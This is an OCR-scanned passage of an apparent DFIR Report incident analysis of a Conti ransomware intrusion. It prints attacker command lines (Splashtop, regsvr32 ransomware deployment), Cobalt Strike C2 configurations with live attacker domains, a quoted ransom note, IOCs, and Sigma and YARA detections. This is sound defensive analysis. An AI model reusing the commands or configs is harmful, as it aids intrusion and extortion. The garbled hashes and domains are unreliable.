AgentPackageSTRemote.exe "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm code-hZCDFPhK75mJ" 
Domain Controller "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm session pwd-4eaecid030f49d48001e131a10f801c1" 
"SplashtopStreamer3360.exe" prevercheck /s /i sec opt-0,confirm d-0,hidewindow-1 


Splashtop Streamer usage leaves many network connections to *.api.splashtop.com and 
* relay.splashtop.com on port 443: 
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*  54-185-153-29.relay.splashtop.com 


* 129-146-44-44.relay.splashtop.com 

129-146-110-111.relay.splashtop.com 

- 129-146-244-119.relay.splashtop.com *  85-212-250-230.relay.splashtop.com 
*  152-70-151-144.relay.splashtop.com 


129-146-178-189.relay.splashtop.com st-v3-univ-srs-win-3484-g3.api.splashtop.com 
* 152-70-137-190.relay.splashtop.com 
* .129-146-69-130.relay.splashtop.com * 54-245-159-230.relay.splashtop.com 


* 129-146-60-216.relay.splashtop.com 152:/0-156-240,relay.oplashtop.com 
* ^ 132-226-26-231.relay.splashtop.com 
* .85-212-219-253.relay.splashtop.com * 18-144-169-39.relay.splashtop.com 
. 129-146-104-247 rel (Geht * 129-146-74-69.relay.splashtop.com 
2971407105247 relayeplas IO CO 70-139-212.relay.splashtop.com * st-ookup-v1-univ-srs-win-3484-g3.api.splashtop.com 
` 129-146-166-188.relay.splashtop.com :—16-236-168-229 relay. splashtop.com 
+ 13-52-245-62.relay.splashtop.com 
129-146-187-22 relay splashtop.com * 35-215-103-108.relay.splashtop.com 
129-146-179-153.relay.splashtop.co *  152-70-142-108.relay.splashtop.com 
TOY Sp H 3B.215-102-184.relay.splashtop.com *  85-212-219-64.relay.splashtop.com 
* 129-146-248-88.relay.splashtop.com 
splashtop.com 
* 54-185-174-1.relay.splashtop.com 


PS Z 129-146-179-1 26.relay.splashtop.corm 9-146-123-170.relay. 
0! "SRManager.exe" : = 
RTE SS 


129-146-110-88.relay.splashtop.com 
SP pe Sv.symcd.com 


Nee S1-relay.splashtop.c Ae 65 59 relay.splashtop.com — WT 
. = * 152-70-137-94.relay.splashtop.com 
129-146-74-225.relay.splashtop. C0 0 146 75-1 32.relay.splashtop.com. 
* 129-146-197-145.relay.splashtop.com 
`  158-101-29-1 8.relay.spladhres 200-7 -1918Y else, solashtop.com 
*—129-146-108-138.relay.splashtop compo. 46.1 64-49.relay.splashtop.com 
*— 152-70-130-227.relay.splashtop.com 

` 429-146-168-90.relay.splashiop com ~: | RERO plashtop.com 

+. 129-146-51-151.relay.splashtop.con; | 35-212-225-149.relay.splashtop.com 


St2-v3-dc.splashtop.com 


+ 129-146-249-100.relay.splashtop.com ` | g 
+ 54-218-11 4-207 relay.splasht gy 3-univ-srs-win-3484-g3.api.splashtop.com 


- s2.symcb.com * .152-70-146-124.relay.splashtop.com 


129-146-174-231.relay.splashtop.com 
* 129-146-67-93.relay.splashtop.com 


Cobalt Strike 


We observed a default Cobalt Strike malleable C2 profile, using the jquery agent string. This 
activity can be detected with relative ease by the ET rules. 


179.43.176.93 80 POST shytur.com /jauery-3.3.2.min.js?  cfduid-KZeFÜhilsHccp7dxHac 
179.43.176.93 80 POST shytur.com /jauery-3.3.2.min.js?. cfduid- 26Escb5dtYbNV7WHylY 
179.43.176.93 80 GET shytur.com /jauery-3.3.1.min.js 

179.43.176.93 80 POST shytur.com /jauery-3.3.2.min.js?  cfduid-9 -5P87Jg0. CyoOGww 
179.43.176.93 80 POST shytur.com /jauery-3.3.2.min.js? | cfduid-Cvw60T7JAnY9zw5wPA 


179.43.176.93 80 GET shytur.com /jauery-3.3.1.min.js 


There appeared to be no jitter configured, resulting in a constant stream of HTTP requests, 
and if using ET rules, constant alerts would be generated. 


Just based on the ET Cobalt Strike rule, ‘ET MALWARE Cobalt Strike Malleable C2 JQuery 
Custom Profile Response’, there were in excess of 6K alerts generated. 


Due to the length of this intrusion, we observerd the threat actors handing off between C2 
servers. We also observed one Cobalt Strike domain change IP resolutions three times, over 
the length of the case. 
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2021-12-27123:45:21.187 MOX 
2021-12-27123:40:06.862 a iert 
2021-12-27123:40:06.334 Ev: 
2021-12-27T23:40:05.536 a iert 
2021-12-27123:40:05.304 WU 
2021-12-27123:40:04.623 Wt 
2021-12-27123:40:04.030 WIN" 
2021-12-27123:40:03.794 Wat 


2021-12-27T123:40:03.713 alert 


IcedID: 


guguchrome.com 
5.181.80.214:80 


applesflying.com 

5.181.80.113:443 

Ja3: a0e9f5d64349fb13191bc781f81f42e1 
JA3s: ec74a5c51106f0419184d0dd08fb05bc 
Certificate: [89:ac:17:b1:f1:b6:9e:c8:bb:e5:f3:59:ac:e4:91:b2:91:f4:85:58 | 
Not Before: 2021/12/08 20:30:05 UTC 
Not After: 2022/12/08 20:30:05 UTC 
Issuer Org: Internet Widgits Pty Ltd 
Subject Common: localhost 

Subject Org: Internet Widgits Pty Ltd 
Public Algorithm: rsaEncryption 


Cobalt Strike: 


21/35 


bunced.net 

103.208.86.7:80 

103.208.86.7:443 

Ja3: Oeecb7bi1551fba4ec03851810d31743f 
JA3s:10b29985cd0ecd878ac083f059c42d51 
Certificate: [8f:98:c5:f8:48:96:b6:cd:13:91:7c:4c:32:85:db:b7:e5:e1:bc:8f ] 
Not Before: 2021/12/09 10:32:43 UTC 
Not After: 2022/03/09 10:32:42 UTC 
Issuer Org: Let's Encrypt 

Subject Common: bunced.net 

Public Algorithm: id-ec 

PublicKey Curve: secp384r1 
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d 


j 


"x64": { 


3 


"sha256": "O1a4c5ef0410b379fa83ac1a4132ba6f7b5814192dbdb87e9d7370e6256ea528", 


"md5": "21242d958caf225f76ad71a4d3a6d4d9", 
"config": ( 
"Jitter": 10, 
"Spawn To x86": "%windir%\\syswow64\\dllhost.exe", 
"Port": 80, 
"Watermark": 0, 
"C2 Host Header": "", 
"HTTP Method Path 2": "/jquery-3.3.2.min.js", 
"Beacon Type": "© (HTTP)", 
"C2 Server": "bunced.net,/jquery-3.3.1.min.js", 
"Method 1": "GET", 
"Spawn To x64": "%windir%\\sysnative\\dllhost.exe", 
"Method 2": "POST", 
"Polling": 5000 
+; 
"time": 1639100549541.8, 
"Shai": "O4bbdOffa580dd5a85ce4c7fc19c66cc753e45ff", 
"uri queried": "/uKVG" 


"x86": { 


} 


"sha256": "9cO1afed2a863fa2466679ef53127e925963cc95de98bc4c59cb4743ccc73bf 5", 


"md5": "e7dfO3bc59b478f0588039416b845c7f", 
"config": { 
"Jitter": 10, 
"Spawn To x86": "%windir%\\syswow64\\dllhost.exe", 
"Port": 80, 
"Watermark": 0, 
"C2 Host Header": "", 
"HTTP Method Path 2": "/jquery-3.3.2.min.js", 
"Beacon Type": "© (HTTP)", 
"C2 Server": "bunced.net,/jquery-3.3.1.min.js", 
"Method 1": "GET", 
"Spawn To x64": "%windir%\\sysnative\\dllhost.exe", 
"Method 2": "POST", 
"Polling": 5000 
}, 
"time": 1639100538593.3, 
"Shai": "18ddb5fac720599983791036e43154a9ce67ffde", 
"uri_queried": "/Uq4b" 


shytur.com 

179.43.176.93:80 
216.73.159.33:80 
179.43.176.80:80 
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d 


"x64": { 
"config": ( 
"Port": 80, 


"Beacon Type": "© (HTTP)", 
"Spawn To x86": "%windir%\\syswow64\\dllhost.exe", 
"Polling": 5000, 
"Method 2": "POST", 
"C2 Server": "shytur.com,/jquery-3.3.1.min.js", 
"C2 Host Header": "", 
"Method 1": "GET", 
"Spawn To x64": "%windir%\\sysnative\\dllhost.exe", 
"Watermark": 0, 
"Jitter": 10, 
"HTTP Method Path 2": "/jquery-3.3.2.min.js" 
Fi 
"uri queried": "/RnJS", 
"md5": "22bbd14a893b19220e829940ad474687", 


"sha256": "10084d7146462d06c599bd14664d14c511b40687e21983e6f8bded06982931a9", 


"Shai": "06ef512d5a2b9353b6d0a412a18766e024d3474527", 
"time": 1640639559417.7 
d 
"x86": { 

"config": { 
"Port": 80, 
"Beacon Type": "© (HTTP)", 
"Spawn To x86": "%windir%\\syswow64\\dllhost.exe", 
"Polling": 5000, 
"Method 2": "POST", 
"C2 Server": "shytur.com,/jquery-3.3.1.min.js", 
"C2 Host Header": "", 
"Method 1": "GET", 
"Spawn To x64": "%windir%\\sysnative\\dllhost.exe", 
"Watermark": 0, 
"Jitter": 10, 
"HTTP Method Path 2": "/jquery-3.3.2.min.js" 

}, 

"uri_queried": "/COPz", 

"md5": "a48fbea91a31afaf348f713bif59dfbf", 


"sha256": "d281caef6c8fc45d8725d6cd1542234aea35b97b99bb6aaff7688d91a10716f0", 


"shai": "7d700ad69d2800de159af5f50bbb82e89467d8b4", 
"time": 1640639554775.3 
} 
} 


cirite.com 

23.81.246.30 

Ja3: a0e9f5d64349fb13191bc781f81f42e1 

Ja3s: ae4edc6faf64d08308082ad26be60767 

Certificate: [f1:43:f2:43:29:79:35:ad:b5:60:c7:79:3a:0f:c6:68:a3:f2:d5:d1 ] 
Not Before: 2021/10/22 00:00:00 UTC 

Not After: 2022/10/22 23:59:59 UTC 

Issuer Org: Sectigo Limited 

Subject Common: cirite.com [cirite.com ,www.cirite.com ] 

Public Algorithm: rsaEncryption 
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"beacontype": [ 
"HTTPS" 
il; 
"sleeptime": 5000, 
"jitter": 20, 
"maxgetsize": 1864736, 
"spawnto": "AAAAAAAAAAAAAAAAAAAAAA==" , 
"license id": 0, 
"cfg caution": false, 
"kill date": null, 
"server": ( 
"hostname": "cirite.com", 
"port": 443, 
"publickey": 
"MIGfMAOGCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNZaG28qpSpw7xhHStBrU-s2eWiOIBlBERsSzWagdIi1TzzJ 


+, 
"host header": "", 
"useragent header": null, 
"http-get": { 
"uri": "/posting", 
"verb": "GET", 
"client": { 
"headers": null, 
"metadata": null 
}, 
"server": { 
"output": [ 
"print", 
"prepend 600 characters", 
"base64", 
"base64ur1" 
] 
} 
}, 
"http-post": { 
"uri": "/extension", 
"verb": "POST", 
"Client": { 
"headers": null, 
"id": null, 
"output": null 
} 
ep 
"tcp_frame_header": 
"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


"crypto_scheme": 0, 
"proxy": { 
"type": null, 
"username": null, 
"password": null, 
"behavior": "Use IE settings" 


Lë 
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"http post chunk": 0, 
"uses cookies": true, 


"post-ex": ( 
"spawnto x86": "%windir%\\syswow64\\rund1132.exe", 
"spawnto x64": "%windir%\\sysnative\\rund1132.exe" 
de 


"process-inject": { 
"allocator": "VirtualAllocEx", 
"execute": [ 
"CreateThread", 
"CreateRemoteThread", 
"RtlCreateUserThread" 
IP 
"min_alloc": 23886, 
"startrwx": false, 
"stub": "MsiB7fCBDFtfSY7FRZHMbQ==", 
"transform-x86": [ 
"prepend '\\x90\\x90\\x90'" 
IF 
"transform-x64": [ 
"prepend '\\x90\\x90\\x90'" 
1, 


"userwx": false 

}, 

"dns-beacon": { 
"dns_idle": null, 
"dns_sleep": null, 
"maxdns": null, 
"beacon": null, 
"get_A": null, 
"get_AAAA": null, 
"get_TXT": null, 

"put metadata": null, 
"put output": null 

}, 

"pipename": null, 

"smb frame header": 

"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMA 


"stage": { 
"cleanup": true 

}, 

"ssh": { 
"hostname": null, 
"port": null, 


"username": null, 
"password": null, 
"privatekey": null 
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wayeyoy.com 
172.241.29.192:443 

Certificate: [00:e7:34:3a:ad:bc:61:59:16:5e:d4:2b:e7:64:fa:8c:d5:42:40:17] 
Not Before: 2021/12/07 00:00:00 UTC 

Not After: 2022/12/07 23:59:59 UTC 

Issuer Org: Sectigo Limited 

Subject Common: wayeyoy.com [wayeyoy.com ,www.wayeyoy.com ] 

Public Algorithm: rsaEncryption 


A configuration was not obtained for this server. 
Exfiltration 


We did not observe any exfiltration indicators while analyzing host and network forensic 
artifacts. 


This does not mean that there was no exfiltration, as this could have been performed via 
Cobalt Strike beacons over encrypted channels. 


Impact 


On the 19th day of the intrusion, the threat actors prepared for their final objectives. From 
the beachhead host, the directory listings of the domain controllers were checked again, 
followed by the backup server. On the beachhead host, we observed the threat actors attempt 
to execute the final ransomware payload. From that host however the attempt failed. 


The threat actors then proceeded to look for other elevation paths. After a failed attempt with 
CVE-2021-42278 and CVE-2021-42287, the threat actors executed Cobalt Strike beacons on 
a couple of domain controllers. Once they established this access, around twenty minutes 
later, they again attempted the ransomware deployment and this time the payload executed 
properly and began spreading across the network via SMB. 


The threat actors deployed ransomware payload in a DLL, named x64.dll, which was 
executed using backup.bat batch script. 
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Action Type = 1 Initiating Process Command Line = ee Process Command Line + P4 File Name + 


FileCreated svchost.exe -k UnistackSvcGroup -s CDPUserSvc backup. bat 
ProcessCreated svchost.exe -k UnistackSvcGroup -s CDPUserSvc cmd.exe /C backup.bat 

ProcessCreated cmd.exe /C backup.bat conhost.exe Oxffffffff -ForceV1 

ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex DAN C$" x64.dll 

ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p EE x64.dll 

ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p EE CS" x64.d1) 


ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p AED x64.dll 
ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\ C$" x64.dll 
ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p , x64.d11 
ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\| C$" x64.dll 


ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \ GEMME CS" x64.d11 
ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p | cs" x64.dll 
ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p EE x64.d11 
ProcessCreated cmd.exe /C backup.bat regsvrà2.exe /s /n /i:"-m -net -size 10 -nomutex -p WW c$" x64.dll 
ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p E, x64.d1) 
ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p $ :: x64.dll 
ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\ cs x64.d11 


ProcessCreated cmd.exe /C backup. bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p EE, x64.d11 
ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\ hcs" x64.d11 
ProcessCreated cmd.exe /C backup.bat regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\| c$" x64.dll 

. . . " . » S . x 
This x64.dll DLL contains fingerprints, "conti v3.dll", seen in our previous cases: 


.rdata:88888801888323C8 ; Export Ordinals Table for conti u3.dll 
.rdata:88888801888323C68 ; 


® |.rdata:88088001880323C8 word 1888323C8 du 1, 6, 2 ; DATA XREF: .rdata:00000001800323A4f0 
^ |.rdata:88888881888323C6 aConti u3 dll db ‘conti_v3.d11',6 ; DATA XREF: .rdata:88088000188803238CTo 
® |.rdata:88888881888323D3 aDllinstall db 'Dl1lInstall',8 ; DATA XREF: .rdata-off 1888323BhTo 

D 


.rdata:88888881888323DE aDllregisterser db 'DllRegisterSeruer',8 


gives an excellent explanation of command line parameters used during the execution of 
Conti ransomware. 


Once the threat actors pushed the encryptor to C$, an excessive SMB network activity were 
generated in a short period of time (~7K) as indicated by the chart. 
= 


This resulted in files being encrypted and a ‘readme.txt’ ransom note generated on the hosts: 


\AppData\Local\Microsoft\OneDrive\setup\logsfreadme.txt à 1,183 


‘AppData\Local\Microsoft\OneDrive\setup\logshreadme.txt § 1,183 
‘AppData\Local\Microsoft\OneDrive\settings\Personalkreadme.txt § 1,1 
‘AppData\Local\Microsoft\OneDrive\settings\Persona — 1,1 
\AppData\Local\Microsoft\0neDrive\logs\Person 
‘AppData\Local\Microsoft\OneDrive\logs \Common 


‘AppData\Local\Microsoft\OneDrive\logs \Common 


The ransom note has slightly been modified from our last Conti cases: 
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“| readme - Notepad = x 
File Edit Format View Help 
All of your files are currently encrypted by CONTI strain. 


As you know (if you don't - just “google it"), all of the data that has been encrypted by our software cannot be recovered by 
any means without contacting our team directly. 

If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the 
data of the lowest value. 

To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. 


You can contact our team directly for further instructions through our website : 


TOR VERSION : 
(you should download and install TOR browser first https://torproject.org) 


| 


cziBa8Qr4 


YOU SHOULD BE AWARE! 
Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news 
website if you do not respond. So it will be better for both sides if you contact us as soon as possible. 


-- BEGIN ID--- 


---END ID--- 


Indicators 


Network 


Email Addresses used for Atera Registration: 
marsmors1947@gmail.com 
hughess6623@outlook.com 


5.181.80.214:80 
guguchrome.com 


5.181.80.113:443 
applesflying.com 


103.208.86.7:80 
bunced.net 


172.241.29.192:443 
wayeyoy.com 


23.81.246.30:443 
cirite.com 


216.73.159.33:80 
shytur.com 


File 
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data.dll 

71c8eb081c33fd6b2c10effa92154a18 
8222ed4fcac2c7408e7fbb748af1752e72bb9b01 
baebi13eea3a71cfaba9d20ef373dcea69cf31f2ec21f45b83f29f699330cb3e3 


Faicuy4.exe 

feAfbOb3ca2cb379d74cd239e71af44f 
6ccd04b109a5148a04ae3ac7f6bc061ccab2122f 
a79f5ce304707a268b335f63d15e2d7d740b4d09b6e7d095d7d08235360e739c 


Ewge.dll/Ijucko32.dll 

b3053228b51ae7af99e0abfa663368d5 
670d974d936262c1c569442238d953ed009f 7c79 
4d62929aa9e76694a62b46bc05425452f26e1e9b09ea6f294850ace825229966 


Edebef4.dll 

7375eccff18bef7e89665d1a7f31edca 
a0836d54aa2a783fd8bae685a1b94e913b655430 

50d2a2564541887570cf 784c677de6900aa503648c510927e08c32b5a6ae3bf5 


x64.dll 
28bdO1b6b3efa726bf00d633398c5c8a 


11012f0074e37e105c404a2eda61f9d652b8c03d 
8fb035b73bf207243c9b29d96e435ce11eb9810a0f4fdcc6bb25a14a0ec8 


Detections 


Suricata 


ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response 


ET MALWARE Cobalt Strike Beacon Activity (GET) 


ETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI 
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement 


ET POLICY SMB Executable File Transfer 

ET POLICY SMB2 NT Create AndX Request For an Executable File 

ET HUNTING Possible Powershell .ps1 Script Use Over SMB 

ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File 


Sigma 


https://github.com/SigmaHQ/sigma/blob/master/rules/windows/deprecated/sysmon mi 


mikatz detection lsass.yml 


https://github.com/SigmaHQ/sigma/blob/11b6b24660c045bb907ed43cfe007349764173bc/ 


rules/windows/powershell/powershell script/posh ps powerview malicious commandlet 


s.yml 


https://github.com/SigmaHQ/sigma/blob/071bcc292362fd3754a2da00878bba4bae1a335f/ 
rules/windows/process creation/proc creation win ad find discovery.yml 
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https://github.com/SigmaHQ/sigma/blob/6b3fc11a48e8aa2773dfe266c3be11e4c4c973a5/ru 
les/windows/process creation/proc creation win powershell defender disable feature.y 
ml 


https://github.com/SigmaHQ/sigma/blob/eb382c4a59b6d87e186ee269805fe2db2acf250e/ 
rules/windows/builtin/security/win admin share access.yml 


https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/ru 
les/windows/builtin/application/win software atera rmm agent install.yml 


/rules/windows/process creation/proc creation win trust discovery.yml 


https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fcofco59c/ru 
les/windows/process creation/proc creation win susp recon activity.yml 


https://github.com/SigmaHQ/sigma/blob/eo49058d14dd9eco9771b38ed4d59e8b49ba1bad 
/rules/windows/builtin/security/win security cobaltstrike service installs.yml 
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title: CHCP CodePage Locale Lookup 


status: Experimental 


description: Detects use of chcp to look up the system locale value as part of host 


discovery 
author: pete go, TheDFIRReport 
references: 


- https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti- 


ransomware/ 


- https://docs.microsoft.com/en-us/windows-server/administration/windows- 


commands/chcp 
date: 2022/02/21 
modified: 2022/02/21 
logsource: 
category: process creation 
product: windows 
detection: 
selection: 
Image|endswith: 
- '\chcp.com' 
CommandLine|endswith: 
- 'chcp' 
ParentImage|endswith: 
- '\cmd.exe' 


ParentCommandLine|contains: 


= "fc! 

condition: selection 
fields: 

- CommandLine 

- ParentCommandLine 
falsepositives: 

- Unknown 
level: high 
tags: 

- attack.discovery 

- attack.t1614.001 


YARA 
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Të 

YARA Rule Set 

Author: The DFIR Report 

Date: 2022-04-04 

Identifier: 9438 conti 

Reference: https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in- 
conti-ransomware/ 


SE? 


/* Rule Set -------------------------------------- 27 


rule cs_exe_9438 { 
meta: 
description = "9438 - file Faicuy4.exe" 
author = "TheDFIRReport" 
reference = "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends- 
in-conti-ransomware/" 
date = "2022-04-04" 
hashi = "a79f5ce304707a268b335f63d15e2d7d740b4d09b6e7d095d7d08235360e739c" 
strings: 
$x1 = "C:\\Users\\Administrator\\Documents\\Visual Studio 
2008\\Projects\\MUTEXES\\x64\\Release\\MUTEXES. pdb" fullword ascii 


$s2 = "mutexes Version 1.0" fullword wide 

$s3 = " «requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"> 
</requestedExecutionLevel>" fullword ascii 

$s4 = ".?AVCMutexesAppQQ" fullword ascii 

$s5 = ".?AVCMutexesDlgQQ" fullword ascii 

$s6 = "About mutexes" fullword wide 

$s7 = "Mutexes Sample" fullword wide 

$s8 = " 1992 - 2001 Microsoft Corporation. All rights reserved." fullword wide 

$s9 = "&Process priority class:" fullword wide 

$s10 = " Type Descriptor'" fullword ascii 

$s11 = "&About mutexes..." fullword wide 

$s12 = " constructor or from DllMain." fullword ascii 

$s13 - ".?AVCDisplayThreadQQ" fullword ascii 


$s14 = "IsQ:\"P" fullword ascii 
$s15 = "CExampleThread" fullword ascii 


$s16 = ".?AVCCounterThreadQQ" fullword ascii 
$s17 = ".?AVCExampleThreadQQ" fullword ascii 
$s18 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword 
ascii 
$s19 = "CDisplayThread" fullword ascii 
$s20 = "CCounterThread" fullword ascii 
condition: 


uint16(0) == @x5a4d and filesize < 2000KB and 
1 of ($x*) and 4 of them 


rule conti dll 9438 { 
meta: 
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description = "9438 - file x64.d11" 

author - "TheDFIRReport" 

reference - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends- 
in-conti-ransomware/" 

date = "2022-04-04" 

hash1 = "8fb035b73bf207243c9b29d96e435ce11eb9810a0f Af dcc6bb25a14a0ec8cc21" 


strings: 
$s1 - "AppPolicyGetProcessTerminationMethod" fullword ascii 
$s2 - "conti v3.dll" fullword ascii 
$s3 = " «requestedExecutionLevel level='asInvoker' uiAccess-'false' />" 
fullword ascii 
$s4 = "api-ms-win-core-processthreads-11-1-2" fullword wide 
$s5 = "ext-ms-win-ntuser-dialogbox-11-1-0" fullword wide 
$s6 = " Type Descriptor'" fullword ascii 
$s7 = "operator \"\" " fullword ascii 
$s8 = "operator co_await" fullword ascii 
$s9 = " <trustInfo xmlns-N"urn:schemas-microsoft-com:asm.v3N"»" fullword ascii 
$s10 = "api-ms-win-rtcore-ntuser-window-11-1-0" fullword wide 
$s11 = "api-ms-win-security-systemfunctions-11-1-0" fullword wide 
$s12 = "ext-ms-win-ntuser-windowstation-11-1-0" fullword wide 
$s13 - "api-ms-win-appmodel-runtime-11-1-2" fullword wide 
$s14 - " Base Class Descriptor at (" fullword ascii 
$s15 - " Class Hierarchy Descriptor'" fullword ascii 
$s16 - "bad array new length" fullword ascii 
$s17 - " Complete Object Locator'" fullword ascii 
$s18 - ".data$r" fullword ascii 
$s19 - " delete[]" fullword ascii 
$s20 = " «/trustInfo»" fullword ascii 
condition: 
uint16(0) == @x5a4d and filesize < 700KB and 
all of them 
MITRE 
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T1614. 
T1218. 
T1218. 
T1059. 
T1055 
T1003. 
T1486 
T1482 
T1021. 
T1219 
T1083 
T1562. 
T1518. 
T1047 
T1087. 
T1068 
T1082 
T1018 
T1053. 
T1569. 
T1071. 


$0552 
$0154 
S0097 


001 - System Location Discovery: System Language Discovery 


010 - Signed Binary Proxy Execution: Regsvr32 

011 - Signed Binary Proxy Execution: Rund1132 

001 - Command and Scripting Interpreter: PowerShell 
- Process Injection 

001 - OS Credential Dumping: LSASS Memory 

- Data Encrypted for Impact 

- Domain Trust Discovery 

002 - Remote Services: SMB/Windows Admin Shares 

- Remote Access Software 

- File and Directory Discovery 

001 - Impair Defenses: Disable or Modify Tools 

001 - Software Discovery: Security Software Discovery 
- Windows Management Instrumentation 

002 - Account Discovery: Domain Account 

- Exploitation for Privilege Escalation 

- System Information Discovery 

- Remote System Discovery 

005 - Scheduled Task/Job: Scheduled Task 

002 - Service Execution 

001 Web Protocols 


- AdFind 
- Cobalt Strike 
- Ping 


Internal case 49438 
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